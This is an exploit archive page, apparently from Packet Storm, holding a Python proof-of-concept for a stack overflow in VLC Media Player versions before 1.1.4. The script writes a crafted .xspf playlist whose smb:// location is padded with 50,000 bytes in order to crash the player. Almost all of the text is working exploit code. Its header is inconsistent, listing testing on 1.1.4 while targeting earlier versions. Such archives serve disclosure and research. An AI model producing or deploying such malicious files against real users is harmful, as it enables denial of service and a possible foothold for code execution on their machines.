VLC Media Player versions prior to 1.1.4 smb::// URI handling remote stack overflow proof of concept exploit that creates a malicious .xspf file.
3ccdd939f660e8d403b20c15604cf83304701698023a95efde4f2f314c6a8077#!/usr/bin/python
#
# Exploit Title: VLC Media Player < 1.1.4 (.xspf) smb:// URI Handling Remote Stack Overflow PoC
# Date: 04-09-2010
# Author: Hadji Samir , s-Dz[at]hotmail[dot]fr
# Software Link: https://sourceforge.net/projects/vlc/files/1.1.4/win32/vlc-1.1.4-win32.exe/download?use_mirror=garr
# Version: VLC Media Player < 1.1.4
# Tested on: Windows XP sp2 with VLC 1.1.4
# CVE :
# Notes: Samir tjrs mahboul-3lik ...
#
###############################################################################################################
data1 = (
"\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31"
"\x2E\x30\x22\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x55\x54"
"\x46\x2D\x38\x22\x3F\x3E\x0D\x0A\x3C\x70\x6C\x61\x79\x6C\x69\x73"
"\x74\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x22\x20\x78\x6D"
"\x6C\x6E\x73\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E"
"\x65\x78\x65\x6D\x70\x6C\x65\x2E\x6F\x72\x67\x2F\x22\x20\x78\x6D"
"\x6C\x6E\x73\x3A\x76\x6C\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F"
"\x77\x77\x77\x2E\x65\x78\x65\x6D\x70\x6C\x65\x2E\x6F\x72\x67\x2F"
"\x22\x3E\x0D\x0A\x09\x3C\x74\x69\x74\x6C\x65\x3E\x50\x6C\x61\x79"
"\x6C\x69\x73\x74\x3C\x2F\x74\x69\x74\x6C\x65\x3E\x0D\x0A\x09\x3C"
"\x74\x72\x61\x63\x6B\x4C\x69\x73\x74\x3E\x0D\x0A\x09\x09\x3C\x74"
"\x72\x61\x63\x6B\x3E\x0D\x0A\x09\x09\x09\x3C\x6C\x6F\x63\x61\x74"
"\x69\x6F\x6E\x3E\x73\x6D\x62\x3A\x2F\x2F\x65\x78\x61\x6D\x70\x6C"
"\x65\x2E\x63\x6F\x6D\x40\x77\x77\x77\x2E\x65\x78\x61\x6D\x70\x6C"
"\x65\x2E\x63\x6F\x6D\x2F\x23\x7B")
buff = ("\x41" * 50000 )
data2 = (
"\x7D\x3C\x2F\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x3E"
"\x3C\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x20\x61\x70\x70\x6C\x69"
"\x63\x61\x74\x69\x6F\x6E\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77"
"\x77\x77\x2E\x76\x69\x64\x65\x6F\x6C\x61\x6E\x2E\x6F\x72\x67\x2F"
"\x76\x6C\x63\x2F\x70\x6C\x61\x79\x6C\x69\x73\x74\x2F\x30\x22\x3E"
"\x0D\x0A\x09\x09\x09\x09\x3C\x76\x6C\x63\x3A\x69\x64\x3E\x30\x3C"
"\x2F\x76\x6C\x63\x3A\x69\x64\x3E\x0D\x0A\x09\x09\x09\x3C\x2F\x65"
"\x78\x74\x65\x6E\x73\x69\x6F\x6E\x3E\x0D\x0A\x09\x09\x3C\x2F\x74"
"\x72\x61\x63\x6B\x3E\x0D\x0A\x09\x3C\x2F\x74\x72\x61\x63\x6B\x4C"
"\x69\x73\x74\x3E\x0D\x0A\x3C\x2F\x70\x6C\x61\x79\x6C\x69\x73\x74"
"\x3E\x0D\x0A\x0D\x0A")
wizz = open("Mahboul-3lik.xspf","w")
wizz.write(data1 + buff + data2)
wizz.close()
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed